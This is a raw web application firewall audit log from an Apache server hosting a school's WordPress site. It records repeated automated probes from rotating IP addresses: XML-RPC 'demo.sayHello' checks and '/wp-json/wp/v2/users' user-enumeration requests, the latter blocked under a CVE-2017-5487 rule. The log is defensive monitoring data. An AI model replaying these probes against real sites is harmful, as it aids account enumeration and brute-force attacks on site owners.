1747496076595448 3280 (- - -) Stopwatch2: 1747496076595448 3280; combined=1421, p1=481, p2=908, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d9ff35c-Z-- --0df31550-A-- [17/May/2025:22:34:42 +0700] aCisknyxdQCiyU1ENFeeBgAAAAY 103.236.140.4 32942 103.236.140.4 8181 --0df31550-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.89 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0df31550-C-- demo.sayHello --0df31550-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0df31550-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496082204924 5628 (- - -) Stopwatch2: 1747496082204924 5628; combined=4126, p1=560, p2=3325, p3=31, p4=36, p5=102, sr=89, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0df31550-Z-- --5cb43048-A-- [17/May/2025:22:34:50 +0700] aCismum4kjNN-hEbWjKf0QAAAFg 103.236.140.4 33016 103.236.140.4 8181 --5cb43048-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5cb43048-C-- demo.sayHello --5cb43048-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cb43048-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496090054460 5898 (- - -) Stopwatch2: 1747496090054460 5898; combined=4295, p1=576, p2=3497, p3=31, p4=34, p5=93, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cb43048-Z-- --9be4131d-A-- [17/May/2025:22:34:57 +0700] aCisoRKi5m5upc8uMd4VQAAAANU 103.236.140.4 33068 103.236.140.4 8181 --9be4131d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9be4131d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9be4131d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496097235740 2769 (- - -) Stopwatch2: 1747496097235740 2769; combined=1279, p1=416, p2=825, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9be4131d-Z-- --50eaf079-A-- [17/May/2025:22:35:05 +0700] aCisqQTOsBn9MSWb6WLQhgAAAIQ 103.236.140.4 33172 103.236.140.4 8181 --50eaf079-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --50eaf079-C-- demo.sayHello --50eaf079-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --50eaf079-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496105319809 4671 (- - -) Stopwatch2: 1747496105319809 4671; combined=3248, p1=508, p2=2565, p3=28, p4=30, p5=70, sr=58, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50eaf079-Z-- --0a000a67-A-- [17/May/2025:22:35:46 +0700] aCis0um4kjNN-hEbWjKf_gAAAFQ 103.236.140.4 33992 103.236.140.4 8181 --0a000a67-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.137 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.137 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0a000a67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a000a67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496146967927 2266 (- - -) Stopwatch2: 1747496146967927 2266; combined=1104, p1=415, p2=666, p3=0, p4=0, p5=23, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a000a67-Z-- --e089270d-A-- [17/May/2025:22:35:52 +0700] aCis2ATOsBn9MSWb6WLQ0gAAAIQ 103.236.140.4 34104 103.236.140.4 8181 --e089270d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.137 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.137 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e089270d-C-- demo.sayHello --e089270d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e089270d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496152597193 5854 (- - -) Stopwatch2: 1747496152597193 5854; combined=4544, p1=564, p2=3734, p3=39, p4=43, p5=97, sr=74, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e089270d-Z-- --a7ed3849-A-- [17/May/2025:22:36:23 +0700] aCis9xKi5m5upc8uMd4VlQAAANg 103.236.140.4 34658 103.236.140.4 8181 --a7ed3849-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a7ed3849-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7ed3849-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496183607703 2683 (- - -) Stopwatch2: 1747496183607703 2683; combined=1214, p1=411, p2=775, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7ed3849-Z-- --cb090444-A-- [17/May/2025:22:36:31 +0700] aCis_wTOsBn9MSWb6WLQ6AAAAJM 103.236.140.4 34780 103.236.140.4 8181 --cb090444-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.77 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cb090444-C-- demo.sayHello --cb090444-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb090444-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496191071491 5397 (- - -) Stopwatch2: 1747496191071491 5397; combined=4009, p1=516, p2=3278, p3=38, p4=32, p5=86, sr=69, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb090444-Z-- --6156f43f-A-- [17/May/2025:22:37:01 +0700] aCitHRKi5m5upc8uMd4VvgAAAMk 103.236.140.4 35508 103.236.140.4 8181 --6156f43f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.69 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6156f43f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6156f43f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496221803229 2443 (- - -) Stopwatch2: 1747496221803229 2443; combined=1004, p1=349, p2=631, p3=0, p4=0, p5=24, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6156f43f-Z-- --569b7a62-A-- [17/May/2025:22:37:07 +0700] aCitI-m4kjNN-hEbWjKgqAAAAFc 103.236.140.4 35610 103.236.140.4 8181 --569b7a62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.69 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --569b7a62-C-- demo.sayHello --569b7a62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --569b7a62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496227744573 5396 (- - -) Stopwatch2: 1747496227744573 5396; combined=3957, p1=522, p2=3219, p3=33, p4=35, p5=88, sr=71, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --569b7a62-Z-- --ddce305b-A-- [17/May/2025:22:37:13 +0700] aCitKRKi5m5upc8uMd4VyAAAAMw 103.236.140.4 35704 103.236.140.4 8181 --ddce305b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ddce305b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddce305b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496233356225 2524 (- - -) Stopwatch2: 1747496233356225 2524; combined=1100, p1=376, p2=698, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddce305b-Z-- --f406176b-A-- [17/May/2025:22:37:13 +0700] aCitKRKi5m5upc8uMd4VyQAAANg 103.236.140.4 35706 103.236.140.4 8181 --f406176b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f406176b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f406176b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496233368219 1619 (- - -) Stopwatch2: 1747496233368219 1619; combined=818, p1=283, p2=512, p3=0, p4=0, p5=22, sr=57, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f406176b-Z-- --86ae5555-A-- [17/May/2025:22:37:21 +0700] aCitMRKi5m5upc8uMd4V7AAAAMQ 103.236.140.4 35862 103.236.140.4 8181 --86ae5555-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.123 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86ae5555-C-- demo.sayHello --86ae5555-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86ae5555-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496241575734 5323 (- - -) Stopwatch2: 1747496241575734 5323; combined=4181, p1=543, p2=3404, p3=32, p4=35, p5=98, sr=72, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86ae5555-Z-- --95925034-A-- [17/May/2025:22:37:22 +0700] aCitMnyxdQCiyU1ENFeezAAAABg 103.236.140.4 35888 103.236.140.4 8181 --95925034-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.195 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --95925034-C-- demo.sayHello --95925034-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --95925034-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496242953716 5678 (- - -) Stopwatch2: 1747496242953716 5678; combined=4214, p1=547, p2=3393, p3=31, p4=35, p5=119, sr=79, sw=89, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95925034-Z-- --0dcbc903-A-- [17/May/2025:22:38:56 +0700] aCitkATOsBn9MSWb6WLRMgAAAJI 103.236.140.4 37910 103.236.140.4 8181 --0dcbc903-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0dcbc903-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dcbc903-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496336763789 2768 (- - -) Stopwatch2: 1747496336763789 2768; combined=1241, p1=440, p2=770, p3=0, p4=0, p5=30, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dcbc903-Z-- --72ec7907-A-- [17/May/2025:22:39:03 +0700] aCitlxKi5m5upc8uMd4XRQAAAMk 103.236.140.4 38036 103.236.140.4 8181 --72ec7907-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --72ec7907-C-- demo.sayHello --72ec7907-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --72ec7907-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496343897880 5641 (- - -) Stopwatch2: 1747496343897880 5641; combined=4137, p1=546, p2=3370, p3=32, p4=34, p5=92, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72ec7907-Z-- --8308e025-A-- [17/May/2025:22:39:57 +0700] aCitzRKi5m5upc8uMd4XfwAAANc 103.236.140.4 38818 103.236.140.4 8181 --8308e025-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8308e025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8308e025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 